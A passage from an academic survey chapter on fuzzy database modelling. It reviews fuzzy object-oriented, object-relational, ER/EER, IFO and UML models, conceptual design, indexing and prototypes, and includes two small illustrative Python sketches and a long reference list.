The incorporation of imprecise and uncertain information in object-oriented databases has increasingly received attention, where fuzziness is witnessed at the levels of object instances and class hierarchies. Umano, Imada, Hatono, and Tamura (1998) define a fuzzy object-oriented database model that uses fuzzy attribute values with a certainty factor and an SQL-type data manipulation language. An uncertainty and fuzziness in an object-oriented (UFO) database model is proposed in van Gyseghem and de Caluwe (1998) to model fuzziness and uncertainty by means of conjunctive fuzzy sets and generalized fuzzy sets, respectively. The fact that the behavior and structure of an object may be incompletely defined results in a gradual nature for the instantiation of an object. Partial inheritance, conditional inheritance, and multiple inheritance are permitted in fuzzy hierarchies. Based on two different strategies, fuzzy types are added into fuzzy object-oriented databases to manage vague structures in Marín, Vila, and Pons (2000) and Marín, Pons, and Vila (2001), where it is also presented how the typical classes of an OODB can be used to represent a fuzzy type and how the mechanisms of instantiation and inheritance can be modeled using this new kind of type in an OODB. In Marín, Medina, Pons, Sánchez, and Vila (2003), complex object comparison in a fuzzy context is developed. In Cross (2001, 2003), fuzzy relationships in object models were investigated. Based on the extension of a graph-based object model, a fuzzy object-oriented data model is defined in Bordogna, Pasi, and Lucarella (1999). The notion of strength expressed by linguistic qualifiers was proposed, which can be
associated with the instance relationship as well as with the link of an object to a class. Fuzzy classes and fuzzy class hierarchies are thus modeled in the OODB. The definition of graph-based operations to select and browse such a fuzzy object-oriented database that manages both crisp and fuzzy information is proposed in Bordogna and Pasi (2001). Based on similarity relationships, in George, Srikanth, Petry, and Buckles (1996), the range of attribute values is used to represent the set of allowed values for an attribute of a given class. Depending on the inclusion of the actual attribute values of the given object in the ranges of the attributes for the class, the membership degrees of an object to a class can be calculated. Weak and strong class hierarchies were defined based on monotone increase or decrease of the membership of a subclass in its superclass. Based on possibility theory, vagueness and uncertainty are represented in class hierarchies in Dubois, Prade, and Rossazza (1991), where the fuzzy ranges of the subclass attributes define restrictions on those of the superclass attributes, and the degree of inclusion of a subclass in the superclass then depends on the inclusion between the fuzzy ranges of their attributes. Also based on possibility distribution theory, in Ma, Zhang, and Ma (2004), some major notions in object-oriented databases, such as objects, classes, object-class relationships, subclass/superclass, and multiple inheritance, are extended under a fuzzy information environment. A generic model for fuzzy object-oriented databases and some operations are hereby developed. Some efforts have been devoted to establishing a consistent framework for a fuzzy object-oriented model based on the standard of the Object Data Management Group (ODMG) object data model (Cross, Caluwe, & van Gyseghem, 1997). In de Tré and de Caluwe (2003), an object-oriented database modeling technique is presented based on the concept of "level-2 fuzzy set" to deal with a uniform and advantageous representation of both perfect and imperfect
"real world" information. It is also illustrated and discussed how the ODMG data model can be generalized to handle "real world" data in a more advantageous way. In Ndouse (1997), a fuzzy intelligent architecture based on the uncertain object-oriented data model initially introduced by Dubois, Prade, and Rossazza (1991) is proposed. The classes include fuzzy IF-THEN rules to define knowledge, and possibility theory is used for the representation of vagueness and uncertainty. In Lee, Xue, Hsu, and Yang (1999), an approach to OO modeling based on fuzzy logic is proposed to formulate imprecise requirements along four dimensions: fuzzy class, fuzzy rules, fuzzy class relationships, and fuzzy associations between classes. The fuzzy rules, that is, rules with linguistic terms, are used to describe the relationships between attributes. Some special fuzzy object-oriented databases, for example, fuzzy deductive object-oriented databases (Yazici & Koyuncu, 1997; Koyuncu & Yazici, 2003, 2005), fuzzy and probabilistic object bases (Cao & Rossiter, 2003), and so forth, have been developed. In addition, fuzzy object-oriented databases have been applied in some areas such as geographical information systems (Cross & Firat, 2000) and multimedia (Candan & Li, 2001; Majumdar, Bhattacharya, & Saha, 2002). Concerning the most recent research and application issues about fuzzy object-oriented databases, one can refer to (Ma, 2004a).
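The following sketch gives an illustrative approximation, not the exact formulas of George, Srikanth, Petry, and Buckles (1996), of how an object's membership in a class can be derived from the inclusion of its attribute values in the class's allowed value ranges under a similarity relation; the classes, objects, and similarity table are invented for illustration.

SIM = {  # toy similarity relation on a colour domain
    frozenset(["red", "crimson"]): 0.9,
    frozenset(["red", "blue"]): 0.1,
    frozenset(["crimson", "blue"]): 0.1,
}

def sim(a, b):
    return 1.0 if a == b else SIM.get(frozenset([a, b]), 0.0)

def value_inclusion(value, allowed):
    """How well a single attribute value fits the class's allowed value set."""
    return max(sim(value, v) for v in allowed)

def membership(obj, class_ranges):
    """Membership of obj in the class: weakest attribute fit (min combiner)."""
    return min(value_inclusion(obj[a], allowed)
               for a, allowed in class_ranges.items())

sports_car = {"colour": {"red", "crimson"}, "doors": {"2"}}

my_car = {"colour": "red", "doors": "2"}
print(membership(my_car, sports_car))        # 1.0
my_other_car = {"colour": "blue", "doors": "2"}
print(membership(my_other_car, sports_car))  # 0.1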
Fuzzy Object-Relational Databases

Object-relational database systems allow database designers to take advantage of both the powerful object-oriented modeling capability and the robustness of the relational data model. Compared with the fuzzy relational databases and the fuzzy object-oriented databases, few studies have been done in fuzzy object-relational databases. Combining object-relational features
and fuzzy theory, Cubero et al. (2004) develop a fuzzy object-relational database framework to permit the representation of complex imperfect information based on fuzzy relational and object-oriented databases.
FUZZY CONCEPTUAL DATA MODELS

Conceptual (semantic) data models provide designers with powerful mechanisms for generating the most complete specification of the real world. Conceptual data models such as ER/EER and UML represent both complex structures of entities and complex relationships among entities as well as their attributes. So the conceptual data models play an important role in conceptual data modeling and database conceptual design. In order to deal with complex objects and imprecise and uncertain information in conceptual data modeling, one needs fuzzy extensions to conceptual data models, which allow imprecise and uncertain information to be represented and manipulated at a conceptual level. While fuzzy databases have been extensively studied in the last two decades in the context of the relational database model and current efforts have been concentrated on fuzzy object-oriented databases, less research has been done in fuzzy conceptual data modeling.
Fuzzy ER/EER Models

Fuzzy set theory was first applied to some of the basic ER concepts in Zvieli and Chen (1986). Fuzzy entity sets, fuzzy relationship sets, and fuzzy attribute sets were introduced in addition to fuzziness in entity and relationship occurrences and in attribute values. Consequently, a fuzzy extension to the ER algebra (Chen, 1976) has been sketched. Three levels of fuzziness can be found in the ER model.
At the first level, entity sets, relationships and attributes may be fuzzy. In other words, they may have a membership degree to the ER model. The second level is related to the fuzzy occurrences of entities and relationships. The third level concerns the fuzzy values of attributes of special entities and relationships.
Formally, let E, R, and A be the fuzzy entity type set, fuzzy relationship type set, and fuzzy attribute set of the fuzzy ER model, respectively, and let μE, μR, and μA be their membership functions. Then:

• for an entity type, say Ei, we have μE (Ei)/Ei, where μE (Ei) is the degree of Ei belonging to E and 0 ≤ μE (Ei) ≤ 1;
• for a relationship type, say Ri, we have μR (Ri)/Ri, where μR (Ri) is the degree of Ri belonging to R and 0 ≤ μR (Ri) ≤ 1; and
• for an attribute of an entity type or relationship type, say Ai, we have μA (Ai)/Ai, where μA (Ai) is the degree of Ai belonging to A and 0 ≤ μA (Ai) ≤ 1.
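The three levels can be pictured with the following minimal sketch; the entity types, degrees, and values are invented for illustration and are not part of Zvieli and Chen's (1986) proposal.

# Level 1: membership degrees of entity types, relationship types, and
# attributes in the model itself.
E = {"Employee": 1.0, "YoungCustomer": 0.7}    # mu_E(Ei)/Ei
R = {"WorksFor": 1.0, "Prefers": 0.6}          # mu_R(Ri)/Ri
A = {"Salary": 1.0, "Loyalty": 0.5}            # mu_A(Ai)/Ai

# Level 2: fuzzy occurrences -- each entity instance belongs to its entity
# type with a degree.
employee_occurrences = {"e1": 1.0, "e2": 0.8}

# Level 3: fuzzy attribute values of particular occurrences, given as
# possibility distributions.
salary_of_e2 = {"3000": 0.7, "3500": 1.0, "4000": 0.6}

# Example check: every declared degree lies in [0, 1].
for d in list(E.values()) + list(R.values()) + list(A.values()):
    assert 0.0 <= d <= 1.0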
Other efforts to extend the ER model can be found in Ruspini (1986); Vandenberghe (1991); and Vert, Morris, Stock, and Jankowski (2000). In Ruspini (1986), an extension of the ER model with fuzzy values in the attributes was proposed, and a truth value can be associated with each relationship instance. In addition, some special relationships such as same-object, subset-of, and member-of were also introduced. Vandenberghe (1991) applied Zadeh's extension principle to calculate the truth value of propositions; for each proposition, a possibility distribution was defined on the doubleton {true, false} of the classical truth values. The proposal of Vert, Morris, Stock, and Jankowski (2000) was based on the notation used by Oracle and used fuzzy set theory to treat data sets as a collection of fuzzy objects, applying
the result to the area of geospatial information systems (GISs). Without including graphical representations, the fuzzy extensions of several major EER concepts, including superclass/subclass, generalization/specialization, category and the subclass with multiple superclasses, were introduced in Chen and Kerre (1998). More recently, Galindo et al. (2004) extended the EER models by relaxing some constraints with fuzzy quantifiers.
Fuzzy IFO Model

In addition to the ER/EER model, the IFO data model (Abiteboul & Hull, 1987) is a mathematically defined conceptual data model that incorporates the fundamental principles of semantic database modeling within a graph-based representational framework. Extensions of IFO to deal with fuzzy information were proposed in Vila, Cubero, Medina, and Pons (1996) and Yazici, Buckles, and Petry (1999). In Vila et al. (1996), several types of imprecision and uncertainty, such as values without semantic representation, values with semantic representation and disjunctive meaning, values with semantic representation and conjunctive meaning, and the representation of uncertain information, were incorporated into the attribute domain of the object-based data model. In addition to the attribute-level uncertainty, uncertainty was also considered at the object and class levels. Based on similarity relations (Buckles & Petry, 1982), the IFO model is extended to the ExIFO (extended IFO) model to represent uncertainties at the levels of the attribute, the object, and the class in (Yazici, Buckles, & Petry, 1999). Three kinds of attributes are used, namely fuzzy-valued attributes, incomplete-valued attributes, and null-valued attributes, and three cases are distinguished: in the first case, the true data value may belong to a specific set or subset of values; in the second case, the true data value is not known; in the third case, the true data value is available but is not expressed precisely. For each of these attribute types, there is a formal definition and graphical representation. In addition, a high-level primitive is introduced to model fuzzy entity types whose semantics are related to each other with the logic operators OR, XOR, or AND. Using possibility theory, the IFO model is extended to the IF2O (fuzzy IFO) model to represent fuzziness at the levels of the attribute, the object, and the class in (Ma, 2005; Ma & Shen, 2006).

Fuzzy UML Model
UML provides a collection of models to capture the many aspects of a software system (Booch, Rumbaugh, & Jacobson, 1998). Notice that while UML reflects some of the best OO modeling experience available, it lacks some necessary semantics. One such lack can be generalized as the need to handle imprecise and uncertain information, although such information exists in knowledge engineering and databases and has been extensively studied (Parsons, 1996). In Sicilia, Garcia, and Gutierrez (2002) and Sicilia, Garcia, Diaz, and Aedo (2002), a practical approach and implementation for a fuzzy-UML storage version is described. With graphical representations included, the fuzzy extension of several major UML concepts (class, generalization, aggregation, association, and dependency) is introduced in Ma (2004b).
DESIGN AND IMPLEMENTATION OF FUZZY DATABASES

The need for handling imprecision and uncertainty in database management systems (DBMSs) has long been recognized, and a lot of important work has been done on fuzzy logical database models. However, in order to gain acceptance in practice, these fuzzy logical database models should be implemented in actual DBMSs, where they could prove their superior performance.
Conceptual Design of Fuzzy Databases

Traditional databases are generally designed from conceptual data models: by mapping, conceptual data models are converted into database models. It is shown above that less research has been done in modeling fuzzy information in conceptual data models. This is particularly true of developing design methodologies for implementing fuzzy databases.
Conceptual Design of Fuzzy Relational Databases

Chaudhry, Moyne, and Rundensteiner (1999) propose a method for designing fuzzy relational databases (FRDBs) following the extension of the ER model of Zvieli and Chen (1986), taking special interest in converting crisp databases into fuzzy ones. Their ER model includes fuzzy relationships as relationships with at least one attribute, namely, the membership grade. They propose FERM, a design methodology for mapping a fuzzy ER data model to a crisp relational database in four steps: constructing a fuzzy ER data model, transforming it into relational tables, normalization, and ensuring a correct interpretation of the fuzzy relational operators. The IFO model introduced in Abiteboul and Hull (1987) is extended into the fuzzy IFO model based on fuzzy set and possibility distribution theory in (Ma, 2005b), and an approach to mapping a fuzzy IFO model to a fuzzy relational database schema is described.
Conceptual Design of Fuzzy Nested Relational Databases

The ExIFO (extended IFO) model proposed in Yazici, Buckles, and Petry (1999) is an extended version of the IFO model introduced in Abiteboul and Hull (1987), which can represent uncertainties at the levels of the attribute, the object, and
the class. Using the ExIFO model as the semantic data model to represent the database universe at the conceptual design level, Yazici, Buckles, and Petry (1999) describe a mapping process that transforms the ExIFO model into fuzzy extended NF2 relations, including the uncertain properties that are represented in both the ExIFO model and the NF2 database model.
Conceptual Design of Fuzzy Object-Oriented Databases

Ma, Zhang, Ma, and Chen (2001) work with the three levels of Zvieli and Chen (1986) and introduce a fuzzy extended entity-relationship (FEER) model to cope with imperfect as well as complex objects in the real world at a conceptual level. They provide an approach to mapping a FEER model to a fuzzy object-oriented database schema. Ma and Shen (2006) present a conceptual data model and a logical data model, namely, the IF2O model and the fuzzy object-oriented database model, and a formal approach to mapping a fuzzy IFO (IF2O) model to a fuzzy object-oriented database schema is developed.
Index of Fuzzy Databases

High performance is a necessary precondition for the acceptance of fuzzy databases by end users. One important step in improving the efficiency of a database system is the introduction of powerful index structures. It should be noticed, however, that performance issues have been quite neglected in research on fuzzy DBMSs so far. Indexing in fuzzy databases has not received much attention yet, and publications on indexing in fuzzy databases are few. Boss and Helmer (1999) propose index structures for fuzzy DBMSs based on the well-known technique of superimposed coding, together with detailed cost models. In Helmer (2003), several techniques for indexing fuzzy sets in databases are proposed to improve query evaluation performance. The presented access
methods are based on superimposed coding or rely on inverted files. Although there are many indexing techniques for object-oriented data models, there are only a few indexing techniques for fuzzy object-oriented databases. The access structure proposed in Bosc and Pivert (1992a) uses one index per fuzzy predicate tied to an attribute. The objective is to associate each grade of a fuzzy predicate with the list of tuples that satisfy that predicate. This method only deals with homogeneous domains and assumes that the underlying relations are crisp. Another study, Yazici and Cibiceli (1999), introduces a fuzzy access structure along with a record and a file organization schema for fuzzy relational databases. In this access structure, the MLGF structure is extended to index both crisp and fuzzy attribute values together. In Yazici, Ince, and Koyuncu (2004), a multi-dimensional indexing technique (the FOOD Index) is proposed to deal with different kinds of fuzziness in similarity-based fuzzy object-oriented databases. It is shown how the FOOD Index supports various types of flexible queries, and performance results of crisp, range, and fuzzy queries using the FOOD Index are evaluated. A comprehensive overview of indexing techniques suitable for fuzzy object-oriented databases is given in Helmer (2004). Four typical query patterns used in fuzzy object-oriented databases are identified: single-valued, set-valued, navigational, and type hierarchy access. For each query pattern, index structures are presented that support the efficient evaluation of these queries, ranging from standard index structures (like the B-tree) to very sophisticated access methods (like join index hierarchies).
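As a rough illustration of the superimposed-coding idea mentioned above, the sketch below summarizes the support of a stored fuzzy set as a bit signature and uses bitwise containment of a query signature as a cheap pre-filter before an exact check. The hash choice, signature width, and data are arbitrary assumptions here and do not reproduce the specific structures or cost models of the cited papers.

import hashlib

WIDTH = 64  # signature width in bits (arbitrary for this sketch)

def element_bits(element, k=3):
    """Set k pseudo-random bits for one domain element."""
    sig = 0
    for i in range(k):
        h = hashlib.sha256(f"{element}:{i}".encode()).digest()
        sig |= 1 << (int.from_bytes(h[:4], "big") % WIDTH)
    return sig

def signature(support):
    """Superimpose (OR) the bit patterns of all support elements."""
    sig = 0
    for e in support:
        sig |= element_bits(e)
    return sig

stored = {"red", "crimson", "orange"}   # support of a stored fuzzy set
query = {"red", "orange"}               # elements required by a query

s_sig, q_sig = signature(stored), signature(query)
# The stored set can only contain the query elements if its signature covers
# the query signature; false positives are removed by an exact check.
if (q_sig & s_sig) == q_sig:
    print("candidate -> verify exactly:", query <= stored)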
Prototype of Fuzzy Databases

The problem of the implementation of a fuzzy relational database management system (FRDBMS) has been treated in the literature basically
following two basic lines (Medina, Vila, Cubero, & Pons, 1995):

• starting from an RDBMS with precise information, developing a syntax that allows imprecise queries to be formulated; and
• building an FRDBMS prototype that implements a concrete fuzzy relational database model.
The proposal in Medina, Vila, Cubero, and Pons (1995) follows the first line, but includes the capability of representing and handling fuzzy information in a classical RDBMS. Introducing some criteria for the representation and handling of imprecise information, they show a series of mechanisms to implement imprecise information in a classical RDBMS. To design programming interfaces, Sicilia, Garcia, Diaz, and Aedo (2002) describe a software framework called fJDBC that extends the Java Database Connectivity API by enabling fuzzy queries on existing relational databases, using externally stored metadata. Design and implementation issues in similarity-based fuzzy object-oriented databases are presented in Yazici, George, and Aksoy (1998): a software architecture for the implementation of the model is described and the details of a prototype implemented using the EXODUS storage manager (ESM) are discussed. Berzal, Marin, Pons, and Vila (2004) propose a framework and an architecture which can be used to develop fuzzy object-oriented capabilities using the conventional features of the object-oriented data paradigm. Sicilia, Barriocanal, and Gutierrez (2004) try to provide some criteria to select the fuzzy extensions that most seamlessly integrate into the current object storage paradigm known as orthogonal persistence, in which programming-language object models are directly stored, so that database design becomes mainly a matter of object design.
CONCLUSION
Incorporation of fuzzy information in database models has been an important topic of database research because such information extensively exists in data- and knowledge-intensive applications such as natural language processing, artificial intelligence, and CAD/CAM, among others, where fuzzy data play an important role in nature. Therefore, research has been conducted into various approaches to represent and deal with fuzzy data. Some of these techniques, developed at a conceptual level, describe the meaning associated with fuzzy data in a database and are called fuzzy conceptual data modeling; others, developed at a logical level, concentrate on processing the fuzzy data and are called fuzzy logical database modeling. This chapter elaborates on the issue of fuzziness management in conceptual data models and logical database models. Three different approaches to conceptual data modeling are examined: the fuzzy ER/EER model, the fuzzy IFO model, and the fuzzy UML model. These models can represent complex objects with fuzziness in attribute values, and even in the objects themselves, with their powerful abstraction mechanisms. In the logical database models, the fuzzy relational databases, the fuzzy nested relational databases, the fuzzy object-oriented databases, and the fuzzy object-relational databases are discussed, respectively. The fuzzy relational database model has been the subject of more thorough study with respect to data representation and models, query and data processing, and data dependencies and normalization. Finally, the question of designing and implementing fuzzy databases is considered.
ACKNOWLEDGMENT

Work is supported by the Program for New Century Excellent Talents in University (NCET-050288) and the MOE Funds for Doctoral Programs (20050145024).

REFERENCES

Abiteboul, S., & Hull, R. (1987). IFO: A formal semantic database model. ACM Transactions on Database Systems, 12(4), 525-565.

Bahar, O. K., & Yazici, A. (2004). Normalization and lossless join decomposition of similarity-based fuzzy relational databases. International Journal of Intelligent Systems, 19, 885-917. Berzal, F., Marin, N., Pons, O., & Vila, M. A. (2004). A framework to build fuzzy object-oriented capabilities over an existing database system. In Advances in fuzzy object-oriented databases: Modeling and applications (pp. 177-205). Hershey, PA: Idea Group Publishing. Bhattacharjee, T. K., & Mazumdar, A. K. (1998). Axiomatisation of fuzzy multivalued dependencies in a fuzzy relational data model. Fuzzy Sets and Systems, 96(3), 343-352. Bhuniya, B., & Niyogi, P. (1993). Lossless join property in fuzzy relational databases. Data and Knowledge Engineering, 11(2), 109-124. Booch, G., Rumbaugh, J., & Jacobson, I. (1998). The unified modeling language user guide. Addison-Wesley Longman, Inc. Bordogna, G., & Pasi, G. (2001). Graph-based interaction in a fuzzy object oriented database. International Journal of Intelligent Systems, 16(7), 821-841. Bordogna, G., Pasi, G., & Lucarella, D. (1999). A fuzzy object-oriented data model for managing vague and uncertain information. International Journal of Intelligent Systems, 14, 623-651. Bosc, P., Dubois, D., & Prade, H. (1998). Fuzzy functional dependencies and redundancy elimination. Journal of the American Society for Information Science, 49(3), 217-235. Bosc, P., & Lietard, L. (1996). Fuzzy integrals and database flexible querying. In Proceedings of
the 5th IEEE International Conference on Fuzzy Systems (pp. 100-106). Bosc, P., & Pivert, O. (1992a). Fuzzy querying in conventional databases. In Fuzzy logic for management of uncertainty (pp. 645-671). John Wiley and Sons Inc. Bosc, P., & Pivert, O. (1992b). Some approaches for relational databases flexible querying. Journal of Intelligent Information Systems, 1, 323-354. Bosc, P., & Pivert, O. (1995). SQLf: A relational database language for fuzzy querying. IEEE Transactions on Fuzzy Systems, 3, 1-17. Bosc, P., & Pivert, O. (2003). On the impact of regular functional dependencies when moving to a possibilistic database framework. Fuzzy Sets and Systems, 140(1), 207-227. Boss, B., & Helmer, S. (1999). Index structures for efficiently accessing fuzzy data including cost models and measures. Fuzzy Sets and Systems, 108, 11-37. Buckles, B. P., & Petry, F. E. (1982). A fuzzy representation of data for relational database. Fuzzy Sets and Systems, 7(3), 213-226. Candan, K. S., & Li, W. (2001). On similarity measures for multimedia database applications. Knowledge and Information Systems, 3, 30-51. Cao, T. H., & Rossiter, J. M. (2003). A deductive probabilistic and fuzzy object-oriented database language. Fuzzy Sets and Systems, 140, 129-150. Chang, C. S., & Chen, A. L. P. (1998). Efficient refinement of uncertain data by fuzzy integrity constraints. Information Sciences, 104(3-4), 191-211. Chaudhry, N. A., Moyne, J. R., & Rundensteiner, E. A. (1999). An extended database design methodology for uncertain data management. Information Sciences, 121(1-2), 83-112.
Chen, G. Q. (1999). Fuzzy logic in data modeling: Semantics, constraints, and database design. Kluwer Academic Publisher. Chen, G. Q., Kerre, E. E., & Vandenbulcke, J. (1995). The dependency-preserving decomposition and a testing algorithm in a fuzzy relational data model. Fuzzy Sets and Systems, 72(1), 27-37. Chen, G. Q., & Kerre, E. E. (1998). Extending ER/EER concepts towards fuzzy conceptual data modeling. In Proceedings of the 1998 IEEE International Conference on Fuzzy Systems (Vol. 2, pp. 1320-1325). Chen, G. Q., Kerre, E. E., & Vandenbulcke, J. (1994). A computational algorithm for the FFD closure and a complete axiomatization of fuzzy functional dependency (FFD). International Journal of Intelligent Systems, 9, 421-439. Chen, G. Q., Kerre, E. E., & Vandenbulcke, J. (1996). Normalization based on functional dependency in a fuzzy relational data model. Information Systems, 21(3), 299-310. Chen, G. Q., Vandenbulcke, J., & Kerre, E. E. (1992). A general treatment of data redundancy in a fuzzy relational data model. Journal of the American Society of Information Science, 43(4), 304-311. Chen, P. P. (1976). The entity-relationship model: Toward a unified view of data. ACM Transactions on Database Systems, 1(1), 9-36. Chen, S. M., & Jong, W. T. (1997). Fuzzy query translation for relational database systems. IEEE Transactions on Systems, Man, and Cybernetics, 27, 714-721. Chen, Y. C., & Chen, S. M. (2000). Techniques of fuzzy query processing for fuzzy database systems. In Proceedings of the 5th Conference on Artificial Intelligence and Applications (pp. 361-368).
Chiang, D. A., Lin, N. P., & Shis, C. C. (1998). Matching strengths of answers in fuzzy relational databases. IEEE Transactions on Systems, Man, and Cybernetics-Part C: Applications and Reviews, 28, 476-481. Cross, V. (2001). Fuzzy extensions for relationships in a generalized object model. International Journal of Intelligent Systems, 16(7), 843-861. Cross, V. (2003). Defining fuzzy relationships in object models: Abstraction and interpretation. Fuzzy Sets and Systems, 140, 5-27. Cross, V., Caluwe, R., & Van Gyseghem, N. (1997). A perspective from the fuzzy object data management group (FODMG). In Proceedings of the 1997 IEEE International Conference on Fuzzy Systems (Vol. 2, pp. 721-728). Cross, V., & Firat, A. (2000). Fuzzy objects for geographical information systems. Fuzzy Sets and Systems, 113, 19-36. Cubero, J. C., & Vila, M. A. (1994). A new definition of fuzzy functional dependency in fuzzy relational databases. International Journal of Intelligent Systems, 9(5), 441-448. Cubero, J. C., et al. (2004). Fuzzy object management in an object-relational framework. In Proceedings of the 2004 International Conference on Information Processing and Management of Uncertainty in Knowledge-Based Systems (pp. 1767-1774). de Tré, G., & de Caluwe, R. (2003). Level-2 fuzzy sets and their usefulness in object-oriented database modelling. Fuzzy Sets and Systems, 140(1), 29-49. Dubois, D., Prade, H., & Rossazza, J. P. (1991). Vagueness, typicality, and uncertainty in class hierarchies. International Journal of Intelligent Systems, 6, 167-183. Dubois, D., Prade, H., & Sedes, F. (2001). Fuzzy logic techniques in multimedia database querying:
A preliminary investigation of the potentials. IEEE transactions on Knowledge and Data Engineering, 13, 383-392. George, R., Srikanth, R., Petry, F. E., & Buckles, B. P. (1996). Uncertainty management issues in the object-oriented data model. IEEE Transactions on Fuzzy Systems, 4(2), 179-192. Helmer, S. (2003). Evaluating different approaches for indexing fuzzy sets. Fuzzy Sets and Systems, 140, 167-182. Helmer, S. (2004). Index structures for fuzzy object-oriented database systems. In Z. Ma (Ed.), Advances in Fuzzy Object-Oriented Databases: Modeling and Applications (pp. 206-240). Hershey, PA: Idea Group Publishing. Intan, R. & Mukaidono, M. (2000). Fuzzy functional dependency and its application to approximate data querying. In Proceedings of the 2000 International Database Engineering and Applications Symposium (pp. 47-54). Jyothi, S., & Babu, M. S. (1997). Multivalued dependencies in fuzzy relational databases and lossless join decomposition. Fuzzy Sets and Systems, 88(3), 315-332. Kacprzyk, J., Zadrozny, S., & Ziokkowski, A. (1987). FQUERY III+: A “human-consistent” database querying system based on fuzzy logic with linguistic quantifiers. In Proceedings of the 2nd International Fuzzy Systems Association Congress (pp. 443-453). Kamel, M., Hadfield, B., & Ismail, M. (1990). Fuzzy query processing using clustering techniques. Information Processing and Management, 26, 279-293. Kerre, E. E., & Chen, G. Q. (1995). An overview of fuzzy data modeling. In Fuzziness in Database Management Systems (pp. 23-41). Physica-Verlag.
Koyuncu, M., & Yazici, A. (2003). IFOOD: An intelligent fuzzy object-oriented database architecture. IEEE Transactions on Knowledge and Data Engineering, 15(5), 1137-1154. Koyuncu, M., & Yazici, A. (2005). A fuzzy knowledge-based system for intelligent retrieval. IEEE Transactions on Fuzzy Systems, 13(3), 317-330.
Ma, Z. M. (2005b). A conceptual design methodology for fuzzy relational databases. Journal of Database Management, 16(2), 66-83. Ma, Z. M., & Mili, F. (2002a). Handling fuzzy information in extended possibility-based fuzzy relational databases. International Journal of Intelligent Systems, 17(10), 925-942.
Lee, J., Xue, N. L., Hsu, K. H., & Yang, S. J. H. (1999). Modeling imprecise requirements with fuzzy objects. Information Sciences, 118(1-4), 101-119.
Ma, Z. M., & Mili, F. (2002b). An extended possibility-based fuzzy nested relational database model and algebra. In IFIP International Federation for Information Processing (Vol. 221, pp. 285-288). Kluwer Academic Publishers.
Liao, S. Y., Wang, H. Q., & Liu, W. Y. (1999). Functional dependencies with null values, fuzzy values, and crisp values. IEEE Transactions on Fuzzy Systems, 7(1), 97-103.
Ma, Z. M., & Shen, D. R. (2006). Modeling fuzzy information in the IF2O and object-oriented data models. Journal of Intelligent and Fuzzy Systems (accepted).
Liu, W. Y. (1992). The reduction of the fuzzy data domain and fuzzy consistent join. Fuzzy Sets and Systems, 51(1), 89-96.
Ma, Z. M., Zhang, W. J., & Ma, W. Y. (2000). Semantic measure of fuzzy data in extended possibility-based fuzzy relational databases. International Journal of Intelligent Systems, 15(8), 705-716.
Liu, W. Y. (1993a). Extending the relational model to deal with fuzzy values. Fuzzy Sets and Systems, 60(2), 207-212. Liu, W. Y. (1993b). The fuzzy functional dependency on the basis of the semantic distance. Fuzzy Sets and Systems, 59, 173-179. Liu, W. Y. (1997). Fuzzy data dependencies and implication of fuzzy data dependencies. Fuzzy Sets and Systems, 92(3), 341-348. Ma, Z. M. (2004a). Advances in fuzzy object-oriented databases: Modeling and applications. Hershey, PA: Idea Group Publishing. Ma, Z. M. (2004b). Fuzzy information modeling with the UML. In Advances in Fuzzy Object-Oriented Databases: Modeling and Applications (pp. 163-176). Hershey, PA: Idea Group Publishing. Ma, Z. M. (2005a). Fuzzy database modeling with XML. Springer.
Ma, Z. M., Zhang, W. J., & Ma, W. Y. (2004). Extending object-oriented databases for fuzzy information modeling. Information Systems, 29(5), 421-435. Ma, Z. M., Zhang, W. J., Ma, W. Y., & Chen, G. Q. (2001). Conceptual design of fuzzy object-oriented databases utilizing extended entity-relationship model. International Journal of Intelligent Systems, 16(6), 697-711. Ma, Z. M., Zhang, W. J., Ma, W. Y., & Mili, F. (2002). Data dependencies in extended possibility-based fuzzy relational databases. International Journal of Intelligent Systems, 17(3), 321-332. Ma, Z. M., Zhang, W. J., & Mili, F. (2002). Fuzzy data compression based on data dependencies. International Journal of Intelligent Systems, 17(4), 409-426.
Majumdar, A. K., Bhattacharya, I., & Saha, A. K. (2002). An object-oriented fuzzy data model for similarity detection in image databases. IEEE Transactions on Knowledge and Data Engineering, 14(5), 1186-1189.
Raju, K. V. S. V. N., & Majumdar, A. K. (1988). Fuzzy functional dependencies and lossless join decomposition of fuzzy relational database systems. ACM Transactions on Database Systems, 13(2), 129-166.
Marín, N., Medina, J. M., Pons, O., Sánchez, D., & Vila, M. A. (2003). Complex object comparison in a fuzzy context. Information and Software Technology, 45(7), 431-444.
Rundensteiner, E. A., Hawkes, L. W., & Bandler, W. (1989). On nearness measures in fuzzy relational data models. International Journal of Approximate Reasoning, 3, 267-298.
Marín, N., Pons, O., & Vila, M. A. (2001). A strategy for adding fuzzy types to an object-oriented database system. International Journal of Intelligent Systems, 16(7), 863-880.
Ruspini, E. (1986). Imprecision and uncertainty in the entity-relationship model. In Fuzzy logic in knowledge engineering (pp. 18-22). Verlag TUV Rheinland.
Marín, N., Vila, M. A., & Pons, O. (2000). Fuzzy types: A new concept of type for managing vague structures. International Journal of Intelligent Systems, 15, 1061-1085.
Saxena, P. C., & Tyagi, B. K. (1995). Fuzzy functional dependencies and independencies in extended fuzzy relational database models. Fuzzy Sets and Systems, 69, 65-89.
Medina, J. M., Pons, O., Cubero, J. C., & Vila, M. A. (1997). FREDDI: A fuzzy relational deductive database interface. International Journal of Intelligent Systems, 12(8), 597-613.
Shenoi, S., & Melton, A. (1989). Proximity relations in the fuzzy relational databases. Fuzzy Sets and Systems, 31(3), 285-296.
Medina, J. M., Vila, M. A., Cubero, J. C., & Pons, O. (1995). Towards the implementation of a generalized fuzzy relational database model. Fuzzy Sets and Systems, 75, 273-289. Ndouse, T. D. (1997). Intelligent systems modeling with reusable fuzzy objects. International Journal of Intelligent Systems, 12, 137-152. Parsons, S. (1996). Current approaches to handling imperfect information in data and knowledge bases. IEEE Transactions on Knowledge and Data Engineering, 8(2), 353-372. Petry, F. E. (1996). Fuzzy databases: Principles and applications. Kluwer Academic Publisher. Prade, H. & Testemale, C. (1984). Generalizing database relational algebra for the treatment of incomplete or uncertain information. Information Sciences, 34, 115-143.
